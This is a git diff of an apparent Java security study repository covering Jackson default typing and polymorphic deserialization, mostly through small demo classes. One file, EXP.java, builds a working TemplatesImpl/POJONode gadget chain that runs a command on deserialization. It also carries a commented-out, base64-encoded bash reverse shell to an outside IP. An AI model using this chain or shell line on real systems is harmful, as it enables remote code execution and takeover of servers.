@@ -1,11 +1,17 @@
 package com.drunkbaby;
 
+import com.drunkbaby.defaultTyping.object_and_non_concrete.Sex;
+
+// 基础序列化与反序列化(多态实现)
 public class Person {
 public int age;
 public String name;
+ public Object object;
+ public Sex sex;
+ public Hacker hacker;
 
 @Override
 public String toString() {
- return String.format("com.drunkbaby.Person.age=%d, com.drunkbaby.Person.name=%s", age, name);
+ return String.format("Person.age=%d, Person.name=%s, %s, %s, %s", age, name, object == null ? "null" : object, sex == null ? "null" : sex, hacker == null ? "null" : hacker);
 }
 }
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person2.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person2.java
new file mode 100644
index 00000000..89f21e0e
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person2.java
@@ -0,0 +1,16 @@
+package com.drunkbaby;
+
+import com.fasterxml.jackson.annotation.JsonTypeInfo;
+
+// JsonTypeInfo.Id.xxx 实现
+public class Person2 {
+ public int age;
+ public String name;
+ @JsonTypeInfo(use = JsonTypeInfo.Id.NAME)
+ public Object object;
+
+ @Override
+ public String toString() {
+ return String.format("Person.age=%d, Person.name=%s, %s", age, name, object == null ? "null" : object);
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person3.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person3.java
new file mode 100644
index 00000000..47aea865
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person3.java
@@ -0,0 +1,26 @@
+package com.drunkbaby;
+
+import com.drunkbaby.defaultTyping.object_and_non_concrete.Sex;
+import com.fasterxml.jackson.annotation.JsonTypeInfo;
+
+// 反序列化时用到的 Person 类
+public class Person3 {
+ public int age;
+ public String name;
+// @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
+ // 或 @JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)
+ public Sex sex;
+
+ public Person3() {
+ System.out.println("Person3 构造函数");
+ }
+
+ public void setAge(int age) {
+ System.out.println("Person3 setter 函数");
+ }
+
+ @Override
+ public String toString() {
+ return String.format("Person.age=%d, Person.name=%s, %s", age, name, sex == null ? "null" : sex);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person4.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person4.java
new file mode 100644
index 00000000..d565a5ea
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/Person4.java
@@ -0,0 +1,25 @@
+package com.drunkbaby;
+
+import com.drunkbaby.defaultTyping.object_and_non_concrete.Sex;
+
+// 反序列化时用到的 Person 类
+public class Person4 {
+ public int age;
+ public String name;
+// @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
+ // 或 @JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)
+ public Object object;
+
+ public Person4() {
+ System.out.println("Person4 构造函数");
+ }
+
+ public void setAge(int age) {
+ System.out.println("Person4 setter 函数");
+ }
+
+ @Override
+ public String toString() {
+ return String.format("Person.age=%d, Person.name=%s, %s", age, name, object == null ? "null" : object);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/JAVA_LANG_OBJECT_Test.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/JAVA_LANG_OBJECT_Test.java
new file mode 100644
index 00000000..953a2cef
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/JAVA_LANG_OBJECT_Test.java
@@ -0,0 +1,23 @@
+package com.drunkbaby.defaultTyping.java_lang_object;
+
+import com.drunkbaby.Hacker;
+import com.drunkbaby.Person;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class JAVA_LANG_OBJECT_Test {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "drunkbaby";
+ p.object = new Hacker();
+ ObjectMapper mapper = new ObjectMapper();
+ // 设置JAVA_LANG_OBJECT
+ mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT);
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person p2 = mapper.readValue(json, Person.class);
+ System.out.println(p2);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/NoJava_LANG_OBJECT.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/NoJava_LANG_OBJECT.java
new file mode 100644
index 00000000..717b670d
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/java_lang_object/NoJava_LANG_OBJECT.java
@@ -0,0 +1,21 @@
+package com.drunkbaby.defaultTyping.java_lang_object;
+
+import com.drunkbaby.Hacker;
+import com.drunkbaby.Person;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class NoJava_LANG_OBJECT {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "drunkbaby";
+ p.object = new Hacker();
+ ObjectMapper mapper = new ObjectMapper();
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person p2 = mapper.readValue(json, Person.class);
+ System.out.println(p2);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_concrete_and_arrays/NON_CONCRETE_AND_ARRAYS_Test.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_concrete_and_arrays/NON_CONCRETE_AND_ARRAYS_Test.java
new file mode 100644
index 00000000..c41d9b75
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_concrete_and_arrays/NON_CONCRETE_AND_ARRAYS_Test.java
@@ -0,0 +1,28 @@
+package com.drunkbaby.defaultTyping.non_concrete_and_arrays;
+
+import com.drunkbaby.Person;
+import com.drunkbaby.Hacker;
+import com.drunkbaby.defaultTyping.object_and_non_concrete.MySex;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class NON_CONCRETE_AND_ARRAYS_Test {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "drunkbaby";
+ Hacker[] hackers = new Hacker[2];
+ hackers[0] = new Hacker();
+ hackers[1] = new Hacker();
+ p.object = hackers;
+ p.sex = new MySex();
+ ObjectMapper mapper = new ObjectMapper();
+ // 设置NON_CONCRETE_AND_ARRAYS
+ mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS);
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person p2 = mapper.readValue(json, Person.class);
+ System.out.println(p2);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_final/NON_FINAL_Test.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_final/NON_FINAL_Test.java
new file mode 100644
index 00000000..e09e7bcb
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/non_final/NON_FINAL_Test.java
@@ -0,0 +1,26 @@
+package com.drunkbaby.defaultTyping.non_final;
+
+import com.drunkbaby.Person;
+import com.drunkbaby.Hacker;
+import com.drunkbaby.defaultTyping.object_and_non_concrete.MySex;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class NON_FINAL_Test {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "drunkbaby";
+ p.object = new Hacker();
+ p.sex = new MySex();
+ p.hacker = new Hacker();
+ ObjectMapper mapper = new ObjectMapper();
+ // 设置NON_FINAL
+ mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person p2 = mapper.readValue(json, Person.class);
+ System.out.println(p2);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/MySex.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/MySex.java
new file mode 100644
index 00000000..42c27379
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/MySex.java
@@ -0,0 +1,15 @@
+package com.drunkbaby.defaultTyping.object_and_non_concrete;
+
+public class MySex implements Sex {
+ int sex;
+
+ @Override
+ public int getSex() {
+ return sex;
+ }
+
+ @Override
+ public void setSex(int sex) {
+ this.sex = sex;
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/OBJECT_AND_NON_CONCRETE_Test.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/OBJECT_AND_NON_CONCRETE_Test.java
new file mode 100644
index 00000000..52085b29
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/OBJECT_AND_NON_CONCRETE_Test.java
@@ -0,0 +1,26 @@
+package com.drunkbaby.defaultTyping.object_and_non_concrete;
+
+import com.drunkbaby.Person;
+import com.drunkbaby.Hacker;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+public class OBJECT_AND_NON_CONCRETE_Test {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "drunkbaby";
+ p.object = new Hacker();
+ p.sex = new MySex();
+ ObjectMapper mapper = new ObjectMapper();
+ // 设置OBJECT_AND_NON_CONCRETE
+ mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
+ // 或直接无参调用,输出一样
+ //mapper.enableDefaultTyping();
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+
+ Person p2 = mapper.readValue(json, Person.class);
+ System.out.println(p2);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/Sex.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/Sex.java
new file mode 100644
index 00000000..f144be19
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/defaultTyping/object_and_non_concrete/Sex.java
@@ -0,0 +1,6 @@
+package com.drunkbaby.defaultTyping.object_and_non_concrete;
+
+public interface Sex {
+ public void setSex(int sex);
+ public int getSex();
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest.java
new file mode 100644
index 00000000..fffc4dd0
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest.java
@@ -0,0 +1,19 @@
+package com.drunkbaby.deserialization;
+
+import com.drunkbaby.Person;
+import com.drunkbaby.Person3;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+//两种反序列化方式之一
+public class DeserializationTest {
+
+ public static void main(String[] args) throws Exception {
+ ObjectMapper mapper = new ObjectMapper();
+ mapper.enableDefaultTyping();
+
+ String json = "{\"age\":6,\"name\":\"drunkbaby\",\"sex\":[\"com.drunkbaby.deserialization.MySex2\",{\"sex\":1}]}";
+ Person3 p2 = mapper.readValue(json, Person3.class);
+ System.out.println(p2);
+
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest2.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest2.java
new file mode 100644
index 00000000..1b5229fb
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/DeserializationTest2.java
@@ -0,0 +1,19 @@
+package com.drunkbaby.deserialization;
+
+import com.drunkbaby.Person;
+import com.drunkbaby.Person3;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+// 两种反序列化方式之二,最终结果等效
+public class DeserializationTest2 {
+
+ public static void main(String[] args) throws Exception {
+ ObjectMapper mapper = new ObjectMapper();
+// mapper.enableDefaultTyping();
+
+ String json = "{\"age\":6,\"name\":\"drunkbaby\",\"sex\":[\"com.drunkbaby.deserialization.MySex2\",{\"sex\":1}]}";
+ Person3 p2 = mapper.readValue(json, Person3.class);
+ System.out.println(p2);
+
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/MySex2.java b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/MySex2.java
new file mode 100644
index 00000000..5a5bf086
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonBasic/src/main/java/com/drunkbaby/deserialization/MySex2.java
@@ -0,0 +1,22 @@
+package com.drunkbaby.deserialization;
+
+import com.drunkbaby.defaultTyping.object_and_non_concrete.Sex;
+
+public class MySex2 implements Sex {
+ int sex;
+ public MySex2() {
+ System.out.println("MySex构造函数");
+ }
+
+ @Override
+ public int getSex() {
+ System.out.println("MySex.getSex");
+ return sex;
+ }
+
+ @Override
+ public void setSex(int sex) {
+ System.out.println("MySex.setSex");
+ this.sex = sex;
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonSerialize/.gitignore b/JavaSecurity/Jackson/JacksonSerialize/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonSerialize/pom.xml b/JavaSecurity/Jackson/JacksonSerialize/pom.xml
new file mode 100644
index 00000000..cf0d503a
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/pom.xml
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+
+ <groupid>org.example</groupid>
+ <artifactid>JacksonSerialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ </properties>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonSerialize/ser.bin b/JavaSecurity/Jackson/JacksonSerialize/ser.bin
new file mode 100644
index 00000000..2d4baa25
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/ser.bin differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/EXP.java b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/EXP.java
new file mode 100644
index 00000000..645d742b
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/EXP.java
@@ -0,0 +1,77 @@
+package org.example.drunkbaby;
+
+import com.fasterxml.jackson.databind.node.BaseJsonNode;
+import com.fasterxml.jackson.databind.node.POJONode;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.*;
+import java.lang.reflect.Field;
+
+public class EXP {
+ public static void main(String[] args) throws Exception {
+
+ String cmd = "calc";
+ byte[] code = getTemplates(cmd);
+ byte[][] codes = {code};
+
+ TemplatesImpl template = new TemplatesImpl();
+ setFieldValue(template, "_name", "Drunkbaby");
+ setFieldValue(template, "_tfactory", new TransformerFactoryImpl());
+ setFieldValue(template, "_bytecodes", codes);
+
+ POJONode pojoNode = new POJONode(template);
+
+ BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+
+ setFieldValue(badAttributeValueExpException, "val", pojoNode);
+
+ serialize(badAttributeValueExpException);
+ deserialize("ser.bin");
+
+ }
+
+ public static byte[] getTemplates(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}"
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void setFieldValue(Object obj, String field, Object val) throws Exception {
+ Field dField = obj.getClass().getDeclaredField(field);
+ dField.setAccessible(true);
+ dField.set(obj, val);
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ objectOutputStream.writeObject(obj);
+ objectOutputStream.close();
+ }
+
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/main/SerializeTest.java b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/main/SerializeTest.java
new file mode 100644
index 00000000..edb0ebc6
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/main/SerializeTest.java
@@ -0,0 +1,16 @@
+package org.example.drunkbaby.main;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import org.example.drunkbaby.pojo.Person;
+
+public class SerializeTest {
+ public static void main(String[] args) throws Exception {
+ Person p = new Person();
+ p.age = 6;
+ p.name = "Drunkbaby";
+ ObjectMapper mapper = new ObjectMapper();
+
+ String json = mapper.writeValueAsString(p);
+ System.out.println(json);
+ }
+}
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Hacker.java b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Hacker.java
new file mode 100644
index 00000000..a6577cd8
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Hacker.java
@@ -0,0 +1,5 @@
+package org.example.drunkbaby.pojo;
+
+public class Hacker {
+ public String skill = "hiphop";
+}
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Person.java b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Person.java
new file mode 100644
index 00000000..9e27c89a
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Person.java
@@ -0,0 +1,39 @@
+package org.example.drunkbaby.pojo;
+
+// 基础序列化与反序列化(多态实现)
+public class Person {
+ public int age;
+ public String name;
+ public Object object;
+ public Sex sex;
+ public Hacker hacker;
+
+ public int getAge() {
+ return age;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+
+ public Object getObject() {
+ return object;
+ }
+
+ public void setObject(Object object) {
+ this.object = object;
+ }
+
+ @Override
+ public String toString() {
+ return String.format("Person.age=%d, Person.name=%s, %s, %s, %s", age, name, object == null ? "null" : object, sex == null ? "null" : sex, hacker == null ? "null" : hacker);
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Sex.java b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Sex.java
new file mode 100644
index 00000000..1215e64f
--- /dev/null
+++ b/JavaSecurity/Jackson/JacksonSerialize/src/main/java/org/example/drunkbaby/pojo/Sex.java
@@ -0,0 +1,6 @@
+package org.example.drunkbaby.pojo;
+
+public interface Sex {
+ public void setSex(int sex);
+ public int getSex();
+}
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-annotations-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-annotations-2.13.3.jar
new file mode 100644
index 00000000..60a3ddba
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-annotations-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-core-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-core-2.13.3.jar
new file mode 100644
index 00000000..7e2086d3
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-core-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-databind-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-databind-2.13.3.jar
new file mode 100644
index 00000000..a27e9d70
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-databind-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jdk8-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jdk8-2.13.3.jar
new file mode 100644
index 00000000..6e6a5a9c
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jdk8-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jsr310-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jsr310-2.13.3.jar
new file mode 100644
index 00000000..a0ea06bb
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-datatype-jsr310-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-module-parameter-names-2.13.3.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-module-parameter-names-2.13.3.jar
new file mode 100644
index 00000000..da15bb25
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jackson-module-parameter-names-2.13.3.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jakarta.annotation-api-1.3.5.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jakarta.annotation-api-1.3.5.jar
new file mode 100644
index 00000000..606d992e
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jakarta.annotation-api-1.3.5.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/javassist-3.12.0.GA.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/javassist-3.12.0.GA.jar
new file mode 100644
index 00000000..8f692f4f
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/javassist-3.12.0.GA.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jul-to-slf4j-1.7.36.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jul-to-slf4j-1.7.36.jar
new file mode 100644
index 00000000..ae8f815e
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/jul-to-slf4j-1.7.36.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-api-2.17.2.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-api-2.17.2.jar
new file mode 100644
index 00000000..16d9061d
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-api-2.17.2.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-to-slf4j-2.17.2.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-to-slf4j-2.17.2.jar
new file mode 100644
index 00000000..d6c35f41
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/log4j-to-slf4j-2.17.2.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-classic-1.2.11.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-classic-1.2.11.jar
new file mode 100644
index 00000000..b70c0e6a
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-classic-1.2.11.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-core-1.2.11.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-core-1.2.11.jar
new file mode 100644
index 00000000..e3038da2
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/logback-core-1.2.11.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/slf4j-api-1.7.36.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/slf4j-api-1.7.36.jar
new file mode 100644
index 00000000..7d3ce68d
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/slf4j-api-1.7.36.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/snakeyaml-1.29.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/snakeyaml-1.29.jar
new file mode 100644
index 00000000..b7db2483
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/snakeyaml-1.29.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-aop-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-aop-5.3.22.jar
new file mode 100644
index 00000000..4cd4a5e4
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-aop-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-beans-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-beans-5.3.22.jar
new file mode 100644
index 00000000..a221f6ff
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-beans-5.3.22.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-2.6.11.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-2.6.11.jar
new file mode 100644
index 00000000..7ff3685e
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-2.6.11.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-autoconfigure-2.6.11.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-autoconfigure-2.6.11.jar
new file mode 100644
index 00000000..d01fe1f0
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-autoconfigure-2.6.11.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-jarmode-layertools-2.6.11.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-jarmode-layertools-2.6.11.jar
new file mode 100644
index 00000000..f8004408
Binary files /dev/null and b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-boot-jarmode-layertools-2.6.11.jar differ
diff --git a/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-context-5.3.22.jar b/JavaSecurity/Jackson/JacksonSerialize/src/main/resources/lib/spring-context-5.3.22.jar
new file mode 100644
index 00000000..64204499
